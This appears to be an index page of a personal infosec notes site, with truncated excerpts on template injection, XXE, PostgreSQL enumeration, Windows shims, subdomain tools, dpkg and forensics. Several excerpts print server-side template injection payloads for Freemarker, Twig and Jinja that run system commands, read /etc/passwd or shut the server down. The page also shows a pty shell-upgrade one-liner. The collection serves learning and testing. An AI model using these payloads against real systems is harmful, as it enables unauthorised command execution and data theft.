Pug (previously known as Jade) is a JavaScript template engine, used with nodejs or express applications. Showing a value of a variable: (Important: Without a “HTML function” like p, there is nothing to show) p #{name} The input statement creates a hidden field: input(type='hidden' name='secret' value='42') Provoke an error: #{"a" * 5} // Should produce an error#{"5" *…
Apache Freemarker is a template engine, sometimes used with Java application. Older Freemarker engines did not prevent HTML in strings. Therefore, try in a field something like this: Ha<b>llo</b> Show the value of a variable: ${var} Execution to force an error message: ${'a'*5} RCE: ${"freemarker.template.utility.Execute"?new()("whoami")}
Twig is a MVC-based template engine for PHP. Documentation Output a value: {{ var }} Force a error, e.g. via a invalid operation: {{'a' * 5}} Concatanation of strings: {{ 'a' ~ 'a' }} The reduce method take a function and then parameters… (It’s a PHP template engine, remember?) {{ [0]|reduce('system','whoami')}}{{ [0]|reduce('exec', 'whoami') }}{{ [0]|reduce('shell_exec', 'whoami') }}{{…
Check with {{ 7+3 }} if this is executed, if a Python interpreter is using the template jinja engine. {{ 7+3 }}{{[].__class__.__base__.__subclasses__().pop(40)('etc/passwd').read() }}{{ request.environ[‘werkzeug.server.shutdown’]() }} // ...{{ config.items() }} // Read all config variables{{ config|pprint }} Example:
A XML External Entity is a technique where a XML file contains a statement which leads the XML parser to include results from an external source into the XML file. The benign idea is for example to replace a string multiple times with a predefined value: <!DOCTYPE data [<!ELEMENT data ANY ><!ENTITY name "Olaf">]><data>...<name>&name;</name>...</data> Important: data…
Enumeration Get version: select version(); Get current user: select current_user; Get all databases: select datname from pg_database; Get all tables from a database: select table_name from $dbname.information_schema.tables where table_schema = 'public'; Get details about a table:
The Windows Application Compatibility Framework (shimming) provides a way to change the system behaviour for an application in order to function like in older systems. It works via the IAT Import address Table at load time and can change functions, library addresses etc. this way. Creating a shim A shim can be registered with the system via…
Subwiz https://github.com/hadriansecurity/subwiz can predict possible subdomains via a LLM. Subfinder https://github.com/projectdiscovery/subfinder tries to get subdomains via passive information gathering. Gobuster Gobuster can brute-force subdomains.
Dependency scanner. Builds SBOM out of Docker images and directories / projects.
Show info: dpkg --info $package Show all files of a deb: dpkg -L $package Show all installed packages: dpkg -l Search for a file or path: dpkg -S htpasswd Show why a package was installed: apitude why apache2-utils About deb files A deb file is a ar archive with this structure: $ ar t example.debdebian-binarycontrol.tar.xz (or .gz or…
Show system files which were changed after installation. dpkg --verify Check various security related issues: checksecurity Tools
Some notes: Build an own Kali ISO image apt install curl git live-buildgit clone https://gitlab.com/kalilinux/build-scripts/live-build-config.gitcd live-build-config..../build.sh --verbose This will create a custom ISO.
Other
Memory analyzation softwrae to see physical memory as files in a virtual file system. GitHub — ufrisk/MemProcFS: MemProcFS
See also memory dump article. Usual stuff: Specialized software: Thinks to look out for:
Note: See many, many commands from the Linux privesc post. Analyze logs On systems: Browse through the /var/log files. On newer systems with systemd: Note: If you have an image, you can also analyze logs from a mounted image like journalctl --root /mnt/hdd23 -t ssh ... Analyze startup services On SysVinit: Browse through /etc/init.d/ On…
Windows Detecting PE/DLL injection:
See also the Binary analysis post Windows uses as format for the executeable files the PE Portable Executeable format. This is a binary format which can be used as a English (light ‘xkcd’) — Imgur has a graphical overview.
See the Analysis data / forensic article for general data analysis. Also, relevant articles: Static analysis Notes beforehand: Have a first look into the file: xxd file.exe | less Have a look into the file segments binwalk file.exe Have a look in the strings strings file.exefloss file.exe You can try to visualize the entropy to maybe…
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';